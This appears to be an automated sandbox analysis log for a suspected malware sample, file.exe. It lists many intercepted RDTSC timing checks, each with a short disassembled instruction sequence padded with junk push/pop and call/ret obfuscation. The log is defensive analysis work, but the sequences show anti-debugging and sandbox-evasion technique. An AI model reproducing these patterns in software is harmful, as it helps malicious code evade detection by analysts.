Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C82F39 second address: C82F47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F0064E57026h 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C83730 second address: C83734 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C83885 second address: C8388B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8388B second address: C8388F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8388F second address: C83893 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C83893 second address: C83902 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F00646A4388h 0x0000000c jmp 00007F00646A4389h 0x00000011 jmp 00007F00646A4383h 0x00000016 popad 0x00000017 push ebx 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007F00646A437Ch 0x0000001f pop ebx 0x00000020 popad 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F00646A437Dh 0x00000029 push ebx 0x0000002a pop ebx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C83902 second address: C83906 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C88A4F second address: C88A57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C879A7 second address: C879AD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C43196 second address: C4320B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F00646A4381h 0x00000009 popad 0x0000000a pop edi 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007F00646A4378h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 00000019h 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 cld 0x00000027 lea eax, dword ptr [ebp+12477F05h] 0x0000002d push 00000000h 0x0000002f push ebx 0x00000030 call 00007F00646A4378h 0x00000035 pop ebx 0x00000036 mov dword ptr [esp+04h], ebx 0x0000003a add dword ptr [esp+04h], 00000017h 0x00000042 inc ebx 0x00000043 push ebx 0x00000044 ret 0x00000045 pop ebx 0x00000046 ret 0x00000047 nop 0x00000048 push ebx 0x00000049 ja 00007F00646A4378h 0x0000004f pop ebx 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 jne 00007F00646A4378h 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4320B second address: C2940B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007F0064E57028h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 0000001Ah 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 call dword ptr [ebp+122D1CCBh] 0x00000029 pushad 0x0000002a push ebx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C433DB second address: C433E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4370A second address: C43742 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0064E57026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b add dword ptr [esp], 69196AD4h 0x00000012 mov dword ptr [ebp+122D1F9Bh], edx 0x00000018 push 1D437DEBh 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F0064E57039h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C43742 second address: C43748 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C438D2 second address: C438D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C438D6 second address: C4390B instructions: 0x00000000 rdtsc 0x00000002 jne 00007F00646A4376h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b jmp 00007F00646A4387h 0x00000010 pop edx 0x00000011 popad 0x00000012 xchg eax, esi 0x00000013 mov dword ptr [ebp+122D1AB7h], edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jl 00007F00646A4376h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4390B second address: C4390F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C44062 second address: C44066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C44066 second address: C4406C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4435A second address: C44364 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F00646A437Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4441E second address: C44422 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C44422 second address: C44494 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F00646A437Bh 0x0000000e je 00007F00646A4378h 0x00000014 push eax 0x00000015 pop eax 0x00000016 popad 0x00000017 nop 0x00000018 push 00000000h 0x0000001a push edi 0x0000001b call 00007F00646A4378h 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], edi 0x00000025 add dword ptr [esp+04h], 0000001Bh 0x0000002d inc edi 0x0000002e push edi 0x0000002f ret 0x00000030 pop edi 0x00000031 ret 0x00000032 lea eax, dword ptr [ebp+12477F49h] 0x00000038 mov ecx, 29CDCE75h 0x0000003d nop 0x0000003e pushad 0x0000003f pushad 0x00000040 push ebx 0x00000041 pop ebx 0x00000042 jmp 00007F00646A4388h 0x00000047 popad 0x00000048 jp 00007F00646A437Ch 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C44494 second address: C4450B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jng 00007F0064E57037h 0x0000000c jng 00007F0064E57031h 0x00000012 jmp 00007F0064E5702Bh 0x00000017 nop 0x00000018 mov dx, BBB1h 0x0000001c lea eax, dword ptr [ebp+12477F05h] 0x00000022 push 00000000h 0x00000024 push esi 0x00000025 call 00007F0064E57028h 0x0000002a pop esi 0x0000002b mov dword ptr [esp+04h], esi 0x0000002f add dword ptr [esp+04h], 00000017h 0x00000037 inc esi 0x00000038 push esi 0x00000039 ret 0x0000003a pop esi 0x0000003b ret 0x0000003c call 00007F0064E5702Bh 0x00000041 xor edx, 574FBC73h 0x00000047 pop edx 0x00000048 mov cx, di 0x0000004b nop 0x0000004c jnc 00007F0064E57034h 0x00000052 push eax 0x00000053 pushad 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4450B second address: C4450F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4450F second address: C4451E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 js 00007F0064E57026h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C87CA3 second address: C87CA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C881ED second address: C881F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C881F1 second address: C88211 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F00646A4382h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C88211 second address: C88232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0064E57026h 0x0000000a pop eax 0x0000000b pushad 0x0000000c jnl 00007F0064E57026h 0x00000012 jmp 00007F0064E5702Dh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C88232 second address: C88237 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8D7AA second address: C8D7B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8DA74 second address: C8DA95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F00646A4380h 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e jng 00007F00646A4378h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8DFFA second address: C8E007 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8E007 second address: C8E022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F00646A4387h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8E022 second address: C8E028 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8E028 second address: C8E035 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jc 00007F00646A4376h 0x00000009 pop ecx 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8E035 second address: C8E06D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 pushad 0x00000009 jmp 00007F0064E57033h 0x0000000e jo 00007F0064E57026h 0x00000014 jmp 00007F0064E5702Eh 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c pushad 0x0000001d push edi 0x0000001e pop edi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9389D second address: C938C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F00646A4383h 0x00000009 jmp 00007F00646A4382h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C938C6 second address: C938ED instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F0064E57034h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 jno 00007F0064E57026h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C938ED second address: C938F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9309F second address: C930B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F0064E5702Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C930B7 second address: C930E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007F00646A437Dh 0x0000000f jnl 00007F00646A437Eh 0x00000015 jng 00007F00646A437Eh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C93230 second address: C93260 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0064E5702Fh 0x00000007 jno 00007F0064E57026h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0064E57035h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C98830 second address: C98838 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF8D9A second address: BF8DA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF8DA0 second address: BF8DA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF8DA9 second address: BF8DAF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF8DAF second address: BF8DB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF8DB5 second address: BF8DD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0064E57038h 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007F0064E57026h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BF8DD7 second address: BF8DE1 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F00646A4376h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C97A8F second address: C97ABA instructions: 0x00000000 rdtsc 0x00000002 js 00007F0064E57028h 0x00000008 push eax 0x00000009 pop eax 0x0000000a push ebx 0x0000000b je 00007F0064E57026h 0x00000011 pop ebx 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push ecx 0x00000016 jmp 00007F0064E5702Fh 0x0000001b pushad 0x0000001c popad 0x0000001d pop ecx 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C97C83 second address: C97C8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C97C8B second address: C97C9B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0064E57032h 0x00000008 jl 00007F0064E57026h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C97F68 second address: C97F72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C97F72 second address: C97F76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C97F76 second address: C97FA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007F00646A437Bh 0x0000000d jmp 00007F00646A4381h 0x00000012 push eax 0x00000013 push edx 0x00000014 jng 00007F00646A4376h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C07F54 second address: C07F7F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 jnp 00007F0064E57026h 0x0000000b pop esi 0x0000000c push edi 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f js 00007F0064E57026h 0x00000015 pop edi 0x00000016 pop edx 0x00000017 pop eax 0x00000018 js 00007F0064E57049h 0x0000001e pushad 0x0000001f jns 00007F0064E57026h 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 pushad 0x00000028 popad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9C091 second address: C9C09A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9C228 second address: C9C22C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9C22C second address: C9C230 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9C559 second address: C9C56D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0064E5702Eh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9C56D second address: C9C578 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 js 00007F00646A4376h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9C578 second address: C9C59E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0064E57037h 0x0000000e push esi 0x0000000f push edx 0x00000010 pop edx 0x00000011 pushad 0x00000012 popad 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9C59E second address: C9C5C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F00646A4381h 0x00000009 jmp 00007F00646A4385h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9C5C8 second address: C9C5E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0064E57030h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jo 00007F0064E57042h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA2467 second address: CA249D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F00646A437Ah 0x00000007 jmp 00007F00646A4381h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push edx 0x00000012 pop edx 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F00646A437Fh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA249D second address: CA24A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA24A1 second address: CA24BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F00646A4384h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA1292 second address: CA1296 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA1550 second address: CA1555 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA178A second address: CA17B9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0064E57040h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007F0064E57030h 0x00000010 push ecx 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA218D second address: CA2191 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA2191 second address: CA2195 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA2195 second address: CA21A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007F00646A4376h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA21A5 second address: CA21A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAACFF second address: CAAD21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F00646A4386h 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAAD21 second address: CAAD25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA8D72 second address: CA8D8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F00646A4386h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA9600 second address: CA960B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAA0BB second address: CAA0E9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F00646A437Eh 0x00000008 jmp 00007F00646A4388h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAA0E9 second address: CAA0F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAA432 second address: CAA436 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAA73A second address: CAA744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0064E57026h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAA744 second address: CAA74D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAA74D second address: CAA757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAA757 second address: CAA75F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAA75F second address: CAA765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAA765 second address: CAA779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F00646A437Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAA779 second address: CAA77E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
